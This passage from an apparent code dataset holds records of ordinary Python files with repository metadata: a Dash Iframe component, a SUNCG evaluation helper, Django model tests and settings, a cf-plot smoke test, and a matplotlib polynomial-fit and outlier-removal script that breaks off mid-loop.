        height=Component.UNDEFINED,
        name=Component.UNDEFINED,
        referrerPolicy=Component.UNDEFINED,
        sandbox=Component.UNDEFINED,
        src=Component.UNDEFINED,
        srcDoc=Component.UNDEFINED,
        width=Component.UNDEFINED,
        accessKey=Component.UNDEFINED,
        className=Component.UNDEFINED,
        contentEditable=Component.UNDEFINED,
        contextMenu=Component.UNDEFINED,
        dir=Component.UNDEFINED,
        draggable=Component.UNDEFINED,
        hidden=Component.UNDEFINED,
        lang=Component.UNDEFINED,
        spellCheck=Component.UNDEFINED,
        style=Component.UNDEFINED,
        tabIndex=Component.UNDEFINED,
        title=Component.UNDEFINED,
        loading_state=Component.UNDEFINED,
        **kwargs
    ):
        # All declared props, in the order the Dash renderer expects.
        self._prop_names = [
            "children",
            "id",
            "accessKey",
            "allow",
            "aria-*",
            "className",
            "contentEditable",
            "contextMenu",
            "data-*",
            "dir",
            "draggable",
            "height",
            "hidden",
            "key",
            "lang",
            "loading_state",
            "n_clicks",
            "n_clicks_timestamp",
            "name",
            "referrerPolicy",
            "role",
            "sandbox",
            "spellCheck",
            "src",
            "srcDoc",
            "style",
            "tabIndex",
            "title",
            "width",
        ]
        self._type = "Iframe"
        self._namespace = "dash_html_components"
        # Prefixes accepted as wildcard props (e.g. data-foo, aria-label).
        self._valid_wildcard_attributes = ["data-", "aria-"]
        self.available_properties = [
            "children",
            "id",
            "accessKey",
            "allow",
            "aria-*",
            "className",
            "contentEditable",
            "contextMenu",
            "data-*",
            "dir",
            "draggable",
            "height",
            "hidden",
            "key",
            "lang",
            "loading_state",
            "n_clicks",
            "n_clicks_timestamp",
            "name",
            "referrerPolicy",
            "role",
            "sandbox",
            "spellCheck",
            "src",
            "srcDoc",
            "style",
            "tabIndex",
            "title",
            "width",
        ]
        self.available_wildcard_properties = ["data-", "aria-"]
        # _explicit_args (injected by @_explicitize_args) lists only the
        # keyword arguments the caller actually passed, so UNDEFINED
        # defaults are not forwarded to the renderer.
        _explicit_args = kwargs.pop("_explicit_args")
        _locals = locals()
        _locals.update(kwargs)  # For wildcard attrs
        args = {k: _locals[k] for k in _explicit_args if k != "children"}
        # <iframe> has no required props, so this generated loop is a no-op;
        # the code generator emits it for components that do have them.
        for k in []:
            if k not in args:
                raise TypeError("Required argument `" + k + "` was not specified.")
        super(Iframe, self).__init__(children=children, **args)
| 32.2827 | 84 | 0.592994 |
from dash.development.base_component import Component, _explicitize_args
class Iframe(Component):
    """Dash wrapper for the <iframe> HTML5 element.

    Auto-generated Dash HTML component: every keyword argument maps 1:1 to
    an <iframe> attribute or a Dash renderer prop (id, n_clicks, style, ...).
    See https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe for
    attribute semantics.
    """

    @_explicitize_args
    def __init__(
        self,
        children=None,
        id=Component.UNDEFINED,
        n_clicks=Component.UNDEFINED,
        n_clicks_timestamp=Component.UNDEFINED,
        key=Component.UNDEFINED,
        role=Component.UNDEFINED,
        allow=Component.UNDEFINED,
        height=Component.UNDEFINED,
        name=Component.UNDEFINED,
        referrerPolicy=Component.UNDEFINED,
        sandbox=Component.UNDEFINED,
        src=Component.UNDEFINED,
        srcDoc=Component.UNDEFINED,
        width=Component.UNDEFINED,
        accessKey=Component.UNDEFINED,
        className=Component.UNDEFINED,
        contentEditable=Component.UNDEFINED,
        contextMenu=Component.UNDEFINED,
        dir=Component.UNDEFINED,
        draggable=Component.UNDEFINED,
        hidden=Component.UNDEFINED,
        lang=Component.UNDEFINED,
        spellCheck=Component.UNDEFINED,
        style=Component.UNDEFINED,
        tabIndex=Component.UNDEFINED,
        title=Component.UNDEFINED,
        loading_state=Component.UNDEFINED,
        **kwargs
    ):
        # All declared props, in the order the Dash renderer expects.
        self._prop_names = [
            "children",
            "id",
            "accessKey",
            "allow",
            "aria-*",
            "className",
            "contentEditable",
            "contextMenu",
            "data-*",
            "dir",
            "draggable",
            "height",
            "hidden",
            "key",
            "lang",
            "loading_state",
            "n_clicks",
            "n_clicks_timestamp",
            "name",
            "referrerPolicy",
            "role",
            "sandbox",
            "spellCheck",
            "src",
            "srcDoc",
            "style",
            "tabIndex",
            "title",
            "width",
        ]
        self._type = "Iframe"
        self._namespace = "dash_html_components"
        # Prefixes accepted as wildcard props (e.g. data-foo, aria-label).
        self._valid_wildcard_attributes = ["data-", "aria-"]
        self.available_properties = [
            "children",
            "id",
            "accessKey",
            "allow",
            "aria-*",
            "className",
            "contentEditable",
            "contextMenu",
            "data-*",
            "dir",
            "draggable",
            "height",
            "hidden",
            "key",
            "lang",
            "loading_state",
            "n_clicks",
            "n_clicks_timestamp",
            "name",
            "referrerPolicy",
            "role",
            "sandbox",
            "spellCheck",
            "src",
            "srcDoc",
            "style",
            "tabIndex",
            "title",
            "width",
        ]
        self.available_wildcard_properties = ["data-", "aria-"]
        # _explicit_args (injected by @_explicitize_args) names only the
        # kwargs the caller actually passed; UNDEFINED defaults are skipped.
        _explicit_args = kwargs.pop("_explicit_args")
        _locals = locals()
        _locals.update(kwargs)  # merge wildcard attrs (data-*, aria-*)
        args = {k: _locals[k] for k in _explicit_args if k != "children"}
        # No required props for <iframe>; generated loop is a no-op.
        for k in []:
            if k not in args:
                raise TypeError("Required argument `" + k + "` was not specified.")
        super(Iframe, self).__init__(children=children, **args)
| true | true |
f723488f958901e14198a0adaf402801d40d9fdf | 689 | py | Python | data3d/evaluation/suncg/__init__.py | picwoon/As_built_BIM | 9e6b81e2fd8904f5afd013e21d2db45456c138d5 | [
"MIT"
] | 2 | 2020-03-05T06:39:03.000Z | 2020-03-31T12:08:04.000Z | data3d/evaluation/suncg/__init__.py | picwoon/As_built_BIM | 9e6b81e2fd8904f5afd013e21d2db45456c138d5 | [
"MIT"
] | null | null | null | data3d/evaluation/suncg/__init__.py | picwoon/As_built_BIM | 9e6b81e2fd8904f5afd013e21d2db45456c138d5 | [
"MIT"
] | 1 | 2021-09-24T13:17:40.000Z | 2021-09-24T13:17:40.000Z | import logging
from .suncg_eval import do_suncg_evaluation
def suncg_evaluation(dataset, predictions, iou_thresh_eval, output_folder, box_only, epoch=None, is_train=None, eval_aug_thickness=None, **_):
    """Dispatch SUNCG evaluation to :func:`do_suncg_evaluation`.

    ``box_only`` only triggers a warning (RPN/proposal-only results);
    evaluation proceeds either way.  Extra keyword arguments are accepted
    and discarded so a generic dispatcher can call every dataset evaluator
    with a uniform signature.  Returns whatever ``do_suncg_evaluation``
    returns.
    """
    log = logging.getLogger("maskrcnn_benchmark.inference")
    if box_only:
        log.warning("evaluation with box_only / RPN_Only")
    log.info("performing suncg evaluation")
    eval_kwargs = dict(
        dataset=dataset,
        predictions=predictions,
        iou_thresh_eval=iou_thresh_eval,
        output_folder=output_folder,
        logger=log,
        epoch=epoch,
        is_train=is_train,
        eval_aug_thickness=eval_aug_thickness,
    )
    return do_suncg_evaluation(**eval_kwargs)
| 32.809524 | 142 | 0.721335 | import logging
from .suncg_eval import do_suncg_evaluation
def suncg_evaluation(dataset, predictions, iou_thresh_eval, output_folder, box_only, epoch=None, is_train=None, eval_aug_thickness=None, **_):
    """Run SUNCG evaluation by delegating to ``do_suncg_evaluation``.

    Args:
        dataset: dataset the predictions were computed on (forwarded).
        predictions: model outputs to score (forwarded).
        iou_thresh_eval: forwarded; presumably the IoU matching threshold --
            confirm in suncg_eval.py.
        output_folder: directory for evaluation artefacts (forwarded).
        box_only: truthy value only logs a warning that proposal-only
            (RPN) results are being evaluated; evaluation still runs.
        epoch, is_train, eval_aug_thickness: optional values forwarded
            unchanged.
        **_: further keyword arguments are accepted and ignored so a
            generic dispatcher can call all evaluators uniformly.

    Returns:
        Whatever ``do_suncg_evaluation`` returns.
    """
    logger = logging.getLogger("maskrcnn_benchmark.inference")
    if box_only:
        logger.warning("evaluation with box_only / RPN_Only")
    logger.info("performing suncg evaluation")
    return do_suncg_evaluation(
        dataset=dataset,
        predictions=predictions,
        iou_thresh_eval=iou_thresh_eval,
        output_folder=output_folder,
        logger=logger,
        epoch=epoch,
        is_train = is_train,
        eval_aug_thickness = eval_aug_thickness
    )
| true | true |
f723497ffcc44a33c06f6ecf4277d82e05b6ec37 | 2,743 | py | Python | app/core/tests/test_models.py | tobiasaires/recipes-app-api | 5b657adcd9b0da7121440fc53b9ada595933b445 | [
"MIT"
] | null | null | null | app/core/tests/test_models.py | tobiasaires/recipes-app-api | 5b657adcd9b0da7121440fc53b9ada595933b445 | [
"MIT"
] | 4 | 2021-03-30T13:36:27.000Z | 2021-09-22T19:14:31.000Z | app/core/tests/test_models.py | tobiasaires/recipes-app-api | 5b657adcd9b0da7121440fc53b9ada595933b445 | [
"MIT"
] | null | null | null | from unittest.mock import patch
from django.test import TestCase
from django.contrib.auth import get_user_model
from core import models
def sample_user(email='test@londonappdev.com', password='testpass'):
    """Create and return a sample user for tests.

    Args:
        email: email address for the new user (fixture default provided).
        password: plain-text password for the new user.

    Returns:
        The user created through the active user model's manager.
    """
    return get_user_model().objects.create_user(email, password)
class ModelTests(TestCase):
    """Unit tests for the core models and their string representations."""

    def test_create_user_with_email_successful(self):
        """Creating a user with an email address succeeds."""
        address = 'tobias@test.com'
        secret = 'tobiastobias'
        created = get_user_model().objects.create_user(
            email=address,
            password=secret,
        )
        self.assertEqual(created.email, address)
        self.assertTrue(created.check_password(secret))

    def test_new_user_email_normalized(self):
        """A new user's email address is normalized to lower case."""
        address = 'tobias@TEST.COM'
        created = get_user_model().objects.create_user(address, 'test123')
        self.assertEqual(created.email, address.lower())

    def test_new_user_with_invalid_email(self):
        """Creating a user without an email raises ValueError."""
        with self.assertRaises(ValueError):
            get_user_model().objects.create_user(None, '123423123')

    def test_create_new_superuser(self):
        """create_superuser grants both superuser and staff flags."""
        admin = get_user_model().objects.create_superuser(
            email='tobias@test.com',
            password='tobiastobias',
        )
        self.assertTrue(admin.is_superuser)
        self.assertTrue(admin.is_staff)

    def test_tag_str(self):
        """str(tag) equals the tag's name."""
        tag = models.Tag.objects.create(user=sample_user(), name='Vegan')
        self.assertEqual(str(tag), tag.name)

    def test_ingredient_str(self):
        """str(ingredient) equals the ingredient's name."""
        ingredient = models.Ingredient.objects.create(
            user=sample_user(), name='Cucumber'
        )
        self.assertEqual(str(ingredient), ingredient.name)

    def test_recipe_str(self):
        """str(recipe) equals the recipe's title."""
        recipe = models.Recipe.objects.create(
            user=sample_user(),
            title='Steak and mushroom sauce',
            time_minutes=5,
            price=5.00,
        )
        self.assertEqual(str(recipe), recipe.title)

    @patch('uuid.uuid4')
    def test_recipe_file_name_uuid(self, mock_uuid):
        """Uploaded recipe images are stored under a uuid-based path."""
        mock_uuid.return_value = 'test-uuid'
        file_path = models.recipe_image_file_path(None, 'myimage.jpg')
        self.assertEqual(file_path, 'uploads/recipe/test-uuid.jpg')
| 30.820225 | 70 | 0.641633 | from unittest.mock import patch
from django.test import TestCase
from django.contrib.auth import get_user_model
from core import models
def sample_user(email='test@londonappdev.com', password='testpass'):
    """Create and return a sample user for tests via the active user model."""
    return get_user_model().objects.create_user(email, password)
class ModelTests(TestCase):
    """Unit tests for the core models and their string representations."""

    def test_create_user_with_email_successful(self):
        """Creating a user with an email address succeeds."""
        email = 'tobias@test.com'
        password = 'tobiastobias'
        user = get_user_model().objects.create_user(
            email=email,
            password=password
        )
        self.assertEqual(user.email, email)
        self.assertTrue(user.check_password(password))

    def test_new_user_email_normalized(self):
        """A new user's email address is normalized to lower case."""
        email = 'tobias@TEST.COM'
        user = get_user_model().objects.create_user(email, 'test123')
        self.assertEqual(user.email, email.lower())

    def test_new_user_with_invalid_email(self):
        """Creating a user without an email raises ValueError."""
        with self.assertRaises(ValueError):
            get_user_model().objects.create_user(None, '123423123')

    def test_create_new_superuser(self):
        """create_superuser grants both superuser and staff flags."""
        user = get_user_model().objects.create_superuser(
            email='tobias@test.com',
            password='tobiastobias'
        )
        self.assertTrue(user.is_superuser)
        self.assertTrue(user.is_staff)

    def test_tag_str(self):
        """str(tag) equals the tag's name."""
        tag = models.Tag.objects.create(
            user=sample_user(),
            name='Vegan'
        )
        self.assertEqual(str(tag), tag.name)

    def test_ingredient_str(self):
        """str(ingredient) equals the ingredient's name."""
        ingredient = models.Ingredient.objects.create(
            user=sample_user(),
            name='Cucumber'
        )
        self.assertEqual(str(ingredient), ingredient.name)

    def test_recipe_str(self):
        """str(recipe) equals the recipe's title."""
        recipe = models.Recipe.objects.create(
            user=sample_user(),
            title='Steak and mushroom sauce',
            time_minutes=5,
            price=5.00
        )
        self.assertEqual(str(recipe), recipe.title)

    @patch('uuid.uuid4')
    def test_recipe_file_name_uuid(self, mock_uuid):
        """Uploaded recipe images are stored under a uuid-based path."""
        uuid = 'test-uuid'
        mock_uuid.return_value = uuid
        file_path = models.recipe_image_file_path(None, 'myimage.jpg')
        exp_path = f'uploads/recipe/{uuid}.jpg'
        self.assertEqual(file_path, exp_path)
| true | true |
f7234a867bfcecf8d8305b26428de3c1533b7da4 | 1,235 | py | Python | tests/test_cfplot.py | cedadev/quick-software-tests | e9098cdfae7b7768528d82d485f20c0ce1a7375d | [
"BSD-2-Clause"
] | 1 | 2020-06-07T02:07:56.000Z | 2020-06-07T02:07:56.000Z | tests/test_cfplot.py | cedadev/quick-software-tests | e9098cdfae7b7768528d82d485f20c0ce1a7375d | [
"BSD-2-Clause"
] | 2 | 2021-02-09T17:08:21.000Z | 2021-03-24T13:45:37.000Z | tests/test_cfplot.py | agstephens/quick-software-tests | e9098cdfae7b7768528d82d485f20c0ce1a7375d | [
"BSD-2-Clause"
] | null | null | null | import os
# Interactive smoke test for cf-plot: renders three PNGs and asks the user
# to visually confirm them.  Needs the sample NetCDF files under testdata/
# and an ImageMagick `display` binary on PATH.
import cf
import matplotlib.pyplot as plt  # NOTE(review): imported but unused here
import cfplot as cfp
pngs = ['tas.png', 'ggap1.png', 'ggap2.png']
# Plot 1: contour plot of one time step of tas_A1.nc.
cfp.setvars(file=pngs[0])  # route cfplot output to the PNG file
f=cf.read('testdata/tas_A1.nc')[0]
cfp.con(f.subspace(time=15))
# Plot 2: 500 hPa field on a north-polar stereographic projection.
cfp.setvars(file=pngs[1])
f=cf.read('testdata/ggap.nc')[1]
cfp.mapset(proj='npstere')
cfp.con(f.subspace(pressure=500))
# Plot 3: 2x2 multi-panel figure, one projection per panel, with a single
# shared horizontal colorbar at the bottom.
cfp.setvars(file=pngs[2])
f=cf.read('testdata/ggap.nc')[1]
cfp.gopen(rows=2, columns=2, bottom=0.2)
cfp.gpos(1)
cfp.con(f.subspace(pressure=500), lines=False, colorbar=None)
cfp.gpos(2)
cfp.mapset(proj='moll')
cfp.con(f.subspace(pressure=500), lines=False, colorbar=None)
cfp.gpos(3)
cfp.mapset(proj='npstere', boundinglat=30, lon_0=180)
cfp.con(f.subspace(pressure=500), lines=False, colorbar=None)
cfp.gpos(4)
cfp.mapset(proj='spstere', boundinglat=-30, lon_0=0)
cfp.con(f.subspace(pressure=500), lines=False, colorbar_position=[0.1, 0.1, 0.8, 0.02],
        colorbar_orientation='horizontal')
cfp.gclose()  # finishes the multi-panel figure
# Every PNG must exist on disk; open each in a background viewer.
for png in pngs:
    if not os.path.isfile(png):
        raise Exception(f'PNG not written: {png}')
    os.system(f'display {png} &')
resp = input('Did you see 3 images? ')
print('Please close the images')
if not resp.lower().startswith('y'):
    raise Exception('cfplot tests failed.')
| 25.729167 | 87 | 0.703644 | import os
# Interactive cf-plot smoke test: writes three PNGs (simple contour, polar
# stereographic map, 2x2 multi-projection panel) and asks for visual
# confirmation.  Requires testdata/ NetCDF files and ImageMagick `display`.
import cf
import matplotlib.pyplot as plt  # NOTE(review): imported but unused here
import cfplot as cfp
pngs = ['tas.png', 'ggap1.png', 'ggap2.png']
cfp.setvars(file=pngs[0])  # route cfplot output to the PNG file
f=cf.read('testdata/tas_A1.nc')[0]
cfp.con(f.subspace(time=15))
cfp.setvars(file=pngs[1])
f=cf.read('testdata/ggap.nc')[1]
cfp.mapset(proj='npstere')
cfp.con(f.subspace(pressure=500))
cfp.setvars(file=pngs[2])
f=cf.read('testdata/ggap.nc')[1]
cfp.gopen(rows=2, columns=2, bottom=0.2)  # 2x2 panel, room for colorbar
cfp.gpos(1)
cfp.con(f.subspace(pressure=500), lines=False, colorbar=None)
cfp.gpos(2)
cfp.mapset(proj='moll')
cfp.con(f.subspace(pressure=500), lines=False, colorbar=None)
cfp.gpos(3)
cfp.mapset(proj='npstere', boundinglat=30, lon_0=180)
cfp.con(f.subspace(pressure=500), lines=False, colorbar=None)
cfp.gpos(4)
cfp.mapset(proj='spstere', boundinglat=-30, lon_0=0)
# Last panel carries the single shared horizontal colorbar.
cfp.con(f.subspace(pressure=500), lines=False, colorbar_position=[0.1, 0.1, 0.8, 0.02],
        colorbar_orientation='horizontal')
cfp.gclose()
# Verify output files exist, then show them for manual inspection.
for png in pngs:
    if not os.path.isfile(png):
        raise Exception(f'PNG not written: {png}')
    os.system(f'display {png} &')
resp = input('Did you see 3 images? ')
print('Please close the images')
if not resp.lower().startswith('y'):
    raise Exception('cfplot tests failed.')
| true | true |
f7234aa9d548c2f2faca025d1d296b4791c396fa | 4,748 | py | Python | src/petso/settings/base.py | triump0870/petso | b8252c4eef61a8762f7d6b77fadbf76d9f90b554 | [
"MIT"
] | null | null | null | src/petso/settings/base.py | triump0870/petso | b8252c4eef61a8762f7d6b77fadbf76d9f90b554 | [
"MIT"
] | null | null | null | src/petso/settings/base.py | triump0870/petso | b8252c4eef61a8762f7d6b77fadbf76d9f90b554 | [
"MIT"
] | null | null | null | """
Django settings for petso project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
# NOTE(review): django.core.urlresolvers was removed in Django 2.0
# (use django.urls instead) -- this settings file targets Django < 2.0.
from django.core.urlresolvers import reverse_lazy
from os.path import dirname, join, exists
# from .celeryconfig import *
# Build paths inside the project like this: join(BASE_DIR, "directory")
BASE_DIR = dirname(dirname(dirname(__file__)))
STATICFILES_DIRS = [join(BASE_DIR, 'static')]
MEDIA_ROOT = join(BASE_DIR, 'media')
MEDIA_URL = "/media/"
# Django templates using the Django 1.8+ TEMPLATES setting.
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [
            join(BASE_DIR, 'templates'),
            # insert more TEMPLATE_DIRS here
        ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                # Insert your TEMPLATE_CONTEXT_PROCESSORS here or use this
                # list if you haven't customized them:
                'django.contrib.auth.context_processors.auth',
                'django.template.context_processors.debug',
                'django.template.context_processors.i18n',
                'django.template.context_processors.media',
                'django.template.context_processors.static',
                'django.template.context_processors.tz',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
# 12factor-style configuration: values come from environment variables,
# optionally read from a local.env file next to this module.
import environ
env = environ.Env()
# Ideally the env file should live outside the git repo,
# i.e. BASE_DIR.parent.parent
env_file = join(dirname(__file__), 'local.env')
if exists(env_file):
    environ.Env.read_env(str(env_file))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/dev/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Raises ImproperlyConfigured if SECRET_KEY is not in the environment.
SECRET_KEY = env('SECRET_KEY')
ALLOWED_HOSTS = ['petso.herokuapp.com', 'localhost']
# Application definition
INSTALLED_APPS = (
    'django.contrib.auth',
    'django_admin_bootstrapped',
    'django.contrib.admin',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'authtools',
    'crispy_forms',
    'easy_thumbnails',
    'rest_framework',
    'profiles',
    'accounts',
    'pets',
    'apis'
)
# NOTE(review): MIDDLEWARE_CLASSES is the pre-Django-1.10 setting; newer
# versions use MIDDLEWARE.
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    # 'whitenoise.middleware.WhiteNoiseMiddleware',
)
REST_FRAMEWORK = {
    # Use hyperlinked styles by default.
    # Only used if the `serializer_class` attribute is not set on a view.
    'DEFAULT_MODEL_SERIALIZER_CLASS':
    'rest_framework.serializers.HyperlinkedModelSerializer',
    # Use Django's standard `django.contrib.auth` permissions,
    # or allow read-only access for unauthenticated users.
    'DEFAULT_PERMISSION_CLASSES': [
        'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
    ]
}
# Simplified static file serving.
# https://warehouse.python.org/project/whitenoise/
# STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
ROOT_URLCONF = 'petso.urls'
WSGI_APPLICATION = 'petso.wsgi.application'
# Database
# https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
    # Raises ImproperlyConfigured if DATABASE_URL is not in os.environ.
    'default': env.db(),
}
# Internationalization
# https://docs.djangoproject.com/en/dev/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/dev/howto/static-files/
STATIC_URL = '/static/'
# Crispy Form Theme - Bootstrap 3
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# For Bootstrap 3, map Django's ERROR message level to the 'danger' CSS class.
from django.contrib import messages
MESSAGE_TAGS = {
    messages.ERROR: 'danger'
}
# Authentication Settings
AUTH_USER_MODEL = 'authtools.User'
LOGIN_REDIRECT_URL = reverse_lazy("profiles:show_self")
LOGIN_URL = reverse_lazy("accounts:login")
THUMBNAIL_EXTENSION = 'png' # Or any extn for your thumbnails
| 28.775758 | 81 | 0.715459 | from django.core.urlresolvers import reverse_lazy
# Django settings for the petso project (Django < 2.0 style; see the
# companion copy of this module: django.core.urlresolvers and
# MIDDLEWARE_CLASSES are legacy names kept for compatibility).
from os.path import dirname, join, exists
BASE_DIR = dirname(dirname(dirname(__file__)))
STATICFILES_DIRS = [join(BASE_DIR, 'static')]
MEDIA_ROOT = join(BASE_DIR, 'media')
MEDIA_URL = "/media/"
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [
            join(BASE_DIR, 'templates'),
        ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.contrib.auth.context_processors.auth',
                'django.template.context_processors.debug',
                'django.template.context_processors.i18n',
                'django.template.context_processors.media',
                'django.template.context_processors.static',
                'django.template.context_processors.tz',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
# Use 12factor inspired environment variables or from a file
import environ
env = environ.Env()
# Ideally move env file should be outside the git repo
# i.e. BASE_DIR.parent.parent
env_file = join(dirname(__file__), 'local.env')
if exists(env_file):
    environ.Env.read_env(str(env_file))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/dev/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Raises ImproperlyConfigured exception if SECRET_KEY not in os.environ
SECRET_KEY = env('SECRET_KEY')
ALLOWED_HOSTS = ['petso.herokuapp.com', 'localhost']
# Application definition
INSTALLED_APPS = (
    'django.contrib.auth',
    'django_admin_bootstrapped',
    'django.contrib.admin',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'authtools',
    'crispy_forms',
    'easy_thumbnails',
    'rest_framework',
    'profiles',
    'accounts',
    'pets',
    'apis'
)
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    # 'whitenoise.middleware.WhiteNoiseMiddleware',
)
REST_FRAMEWORK = {
    # Use hyperlinked styles by default.
    # Only used if the `serializer_class` attribute is not set on a view.
    'DEFAULT_MODEL_SERIALIZER_CLASS':
    'rest_framework.serializers.HyperlinkedModelSerializer',
    # Use Django's standard `django.contrib.auth` permissions,
    'DEFAULT_PERMISSION_CLASSES': [
        'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
    ]
}
ROOT_URLCONF = 'petso.urls'
WSGI_APPLICATION = 'petso.wsgi.application'
# Database configuration.  FIX: the setting name had been corrupted to "S"
# (comment-stripping ate the "DATABASE" prefix); Django requires it to be
# called DATABASES -- see the intact copy of this module.
DATABASES = {
    # Raises ImproperlyConfigured if DATABASE_URL is not in os.environ.
    'default': env.db(),
}
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# Map Django's ERROR message level to Bootstrap 3's 'danger' CSS class.
from django.contrib import messages
MESSAGE_TAGS = {
    messages.ERROR: 'danger'
}
AUTH_USER_MODEL = 'authtools.User'
LOGIN_REDIRECT_URL = reverse_lazy("profiles:show_self")
LOGIN_URL = reverse_lazy("accounts:login")
THUMBNAIL_EXTENSION = 'png'
| true | true |
f7234adbc9c065098ba45b81f8e57e7b90b5b899 | 4,461 | py | Python | matplotlib/line.py | aimimi2015/LDA_patent | e5df0b8e1b741c19352485b5b2dca560e1a961f1 | [
"Apache-2.0"
] | 2 | 2018-08-22T03:46:54.000Z | 2020-02-08T10:20:26.000Z | matplotlib/line.py | aimimi2015/LDA_patent | e5df0b8e1b741c19352485b5b2dca560e1a961f1 | [
"Apache-2.0"
] | null | null | null | matplotlib/line.py | aimimi2015/LDA_patent | e5df0b8e1b741c19352485b5b2dca560e1a961f1 | [
"Apache-2.0"
] | 1 | 2019-04-29T06:16:54.000Z | 2019-04-29T06:16:54.000Z | # coding: utf-8
# Fit a quadratic trend to a topic's monthly proportions (loaded from a
# pickled list), remove three-sigma outliers by iterated refitting, and plot
# the raw vs. de-noised fits.
# NOTE(review): duplicated/unused imports below (matplotlib, numpy, pickle
# twice; pprint, pymysql, sympy unused here) -- kept to avoid changing the file.
from __future__ import print_function
from __future__ import print_function
from __future__ import print_function
import matplotlib.pyplot as plt
import numpy as np
import pickle
import pprint
import matplotlib.pyplot as plt
import numpy as np
import pymysql
import pickle
from sympy import *
pkl_file = open('../领域预测/topiclist/list22.pkl', 'rb')  # NOTE(review): never closed
list1 = pickle.load(pkl_file)
# Aggregate list1 into buckets of j consecutive entries.
newlist=[]
sumlist=0
i=0
h=0
j=1 # bucket width; with j = 1 every entry (one month each) is kept as-is
while i<len(list1):
    while h<j:
        sumlist = sumlist+list1[i+h]
        h=h+1
    newlist.append(sumlist)
    sumlist=0
    h=0
    i=i+j
print (len(newlist))
x = np.arange(1, len(newlist)+1, 1)
y = np.array(newlist)
z1 = np.polyfit(x, y, 2) # quadratic least-squares fit (degree 2)
p1 = np.poly1d(z1)
yvals = p1(x)
p2 = abs(yvals - y)   # absolute residuals of the fit
sigma = np.std(p2)    # spread of the residuals, used for the 3-sigma rule
print(sigma)
print(p2)
# The string below documents the three-sigma outlier rule (in Chinese):
# assuming normally distributed residuals, ~99.7% of values fall within
# mu +/- 3*sigma, so anything beyond the 3-sigma threshold is very likely
# an outlier and is replaced by an average of neighbouring points.
'''
具体来说,三西格玛规则是建立在数据服从正态分布的基础之上的,其阈值为
正态分布平均值与三倍标准差之和。在正态分布中标准差为𝜎,均值为𝜇,对于全部
的数据来说,数值分布在(𝜇 − 𝜎,𝜇 + 𝜎)中的概率为 0.655,布在(𝜇 − 2𝜎,𝜇 + 2𝜎)中的
概率为 0.954,分布在(𝜇 − 3𝜎,𝜇 + 3𝜎)中的概率大致为 0.997。规则规定任何大于三
西格玛阈值的值都极有可能是异常值。因此我们以图 4.3 中程序移除异常值,并进行
临近数据点平均值替换。
'''
print ("p1:"),  # NOTE(review): trailing comma is a Python-2 leftover; harmless no-op here
print(p1) # print the fitted polynomial
yvals = p1(x) # equivalently: yvals = np.polyval(z1, x)
ybar = np.sum(y) / len(y)
out = p2>sigma*3   # boolean mask of 3-sigma outliers (for inspection only)
print (out)
ssreg = np.sum((yvals - ybar) ** 2) # explained (regression) sum of squares
sstot = np.sum((y - ybar) ** 2) # total sum of squares of the raw data
print (ssreg / sstot) # R^2-style goodness of fit
plot1 = plt.plot(x, y, '*', label='original values')
plot2 = plt.plot(x, yvals, 'r', label='polyfit values')
plt.xlabel('year(05-15)')
plt.ylabel('Proportion')
plt.legend(loc=4) # legend in the lower-right corner
plt.title('topic1')
plt.show()
plt.savefig('p1.png')  # NOTE(review): called after show(); likely saves an empty figure
y_new = y.tolist() # working copy; outliers are replaced in place below
yvals1 = yvals.tolist() # fitted values matching the initial fit
# Iterated de-noising: replace 3-sigma outliers, refit, and repeat until the
# residual sigma stops changing.
# NOTE(review): endpoints (i == 0 and i == len(y)-1) are never replaced, the
# `elif i==1` branch is unreachable (i==1 already matches the first branch),
# and replacement averages the two *preceding* points rather than the
# neighbours on both sides -- confirm this matches the intended method.
while True:
    i = 0
    while i < len(y):
        if abs(y_new[i]-yvals1[i])>=sigma*3:
            print (y_new[i])
            if i!=0 and i!=len(y)-1:
                y_new[i] = (y_new[i - 1] + y_new[i-2]) * 0.5
            elif i==1:
                y_new[i] = (y_new[0] + y_new[2]) * 0.5
        i=i+1
    z1 = np.polyfit(x, y_new, 2) # refit on the cleaned series
